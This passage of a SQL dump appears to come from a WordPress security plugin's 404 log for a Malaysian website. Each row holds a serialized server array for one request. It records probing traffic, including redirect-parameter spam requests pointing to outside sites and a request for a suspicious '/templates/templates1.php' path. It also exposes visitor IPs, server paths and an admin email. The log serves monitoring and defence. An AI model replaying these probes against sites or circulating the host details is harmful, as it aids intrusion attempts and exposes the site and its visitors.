a_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY1XDQF92QujBG1WhT3NYwAAAAQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569543950.0323\";s:12:\"REQUEST_TIME\";s:10:\"1569543950\";}}','notice','2019-09-27 00:25:53','2019-09-27 00:25:50',35608928,37416032,'https://bintara.com.my/?page_id=18',1,0,'93.81.252.222'),(27115,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:69:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/21.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"165.231.251.193\";s:11:\"REMOTE_PORT\";s:5:\"42186\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0u3oobU@zjjbgWMCB7JwAAAQM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569533663.0502\";s:12:\"REQUEST_TIME\";s:10:\"1569533663\";}}','notice','2019-09-26 21:34:24','2019-09-26 21:34:23',35128976,36926416,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'165.231.251.193'),(27113,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/3\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:23:\"http://bintara.com.my/3\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/3\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0gaVWB4BRJuHfwY@mUjAAAANM\";s:12:\"REDIRECT_URL\";s:2:\"/3\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.176.184\";s:11:\"REMOTE_PORT\";s:5:\"58758\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:10:\"SCRIPT_URL\";s:2:\"/3\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0gaVWB4BRJuHfwY@mUjAAAANM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569529961.4951\";s:12:\"REQUEST_TIME\";s:10:\"1569529961\";}}','notice','2019-09-26 20:32:43','2019-09-26 20:32:42',35128160,36932456,'https://bintara.com.my/3',1,0,'188.166.176.184'),(27114,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:129:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fwww.facebook.com%2Finnerprofitcirclereview&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:69:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/21.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:127:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fwww.facebook.com%2Finnerprofitcirclereview&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"165.231.251.193\";s:11:\"REMOTE_PORT\";s:5:\"47580\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0u1muDzxgKwmTS@aKCLAAAAEY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569533654.7257\";s:12:\"REQUEST_TIME\";s:10:\"1569533654\";}}','notice','2019-09-26 21:34:16','2019-09-26 21:34:15',35127272,36935288,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fwww.facebook.com%2Finnerprofitcirclereview&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'165.231.251.193'),(27112,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Whale/1.0.40.10 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"196.240.60.166\";s:11:\"REMOTE_PORT\";s:5:\"54062\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0gIlfhYxBkXBDDAIpMvAAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569529891.8975\";s:12:\"REQUEST_TIME\";s:10:\"1569529891\";}}','notice','2019-09-26 20:31:33','2019-09-26 20:31:32',35122784,36928832,'https://bintara.com.my/?page_id=18',1,0,'196.240.60.166'),(27111,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:23:\"http://bintara.com.my/2\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/2\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0f9YobU@zjjbgWMCB5WgAAARY\";s:12:\"REDIRECT_URL\";s:2:\"/2\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.176.184\";s:11:\"REMOTE_PORT\";s:5:\"44219\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:10:\"SCRIPT_URL\";s:2:\"/2\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0f9YobU@zjjbgWMCB5WgAAARY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569529845.5083\";s:12:\"REQUEST_TIME\";s:10:\"1569529845\";}}','notice','2019-09-26 20:30:47','2019-09-26 20:30:45',35129520,36937056,'https://bintara.com.my/2',1,0,'188.166.176.184'),(27109,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/2\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0aaVfhYxBkXBDDAIpJcgAAAJE\";s:12:\"REDIRECT_URL\";s:2:\"/2\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.176.184\";s:11:\"REMOTE_PORT\";s:5:\"21934\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:10:\"SCRIPT_URL\";s:2:\"/2\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0aaVfhYxBkXBDDAIpJcgAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569528425.5472\";s:12:\"REQUEST_TIME\";s:10:\"1569528425\";}}','notice','2019-09-26 20:07:08','2019-09-26 20:07:05',35524824,37328944,'https://bintara.com.my/2',1,0,'188.166.176.184'),(27110,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/3\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/3\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0azFfhYxBkXBDDAIpJvAAAAIc\";s:12:\"REDIRECT_URL\";s:2:\"/3\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.176.184\";s:11:\"REMOTE_PORT\";s:5:\"35556\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:10:\"SCRIPT_URL\";s:2:\"/3\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0azFfhYxBkXBDDAIpJvAAAAIc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569528524.6638\";s:12:\"REQUEST_TIME\";s:10:\"1569528524\";}}','notice','2019-09-26 20:08:46','2019-09-26 20:08:45',35130800,36932184,'https://bintara.com.my/3',1,0,'188.166.176.184'),(27099,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:62:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/templates/templates1.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=60cb5ae1add1e3684663e4f87e2aca9e\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:169:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/templates/templates1.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:25:\"/templates/templates1.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY0GGVfhYxBkXBDDAIo9gwAAAIE\";s:38:\"REDIRECT_REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:47:\"REDIRECT_REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/templates/templates1.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:25:\"/templates/templates1.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY0GGVfhYxBkXBDDAIo9gwAAAIE\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/templates/templates1.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/templates/templates1.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0GGVfhYxBkXBDDAIo9gwAAAIE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"104.218.63.75\";s:11:\"REMOTE_PORT\";s:5:\"44674\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/templates/templates1.php\";s:10:\"SCRIPT_URL\";s:25:\"/templates/templates1.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0GGVfhYxBkXBDDAIo9gwAAAIE\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569523226.0727\";s:12:\"REQUEST_TIME\";s:10:\"1569523226\";}}','notice','2019-09-26 18:40:27','2019-09-26 18:40:26',35184776,36985104,'https://bintara.com.my/templates/templates1.php',1,0,'104.218.63.75'),(27091,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 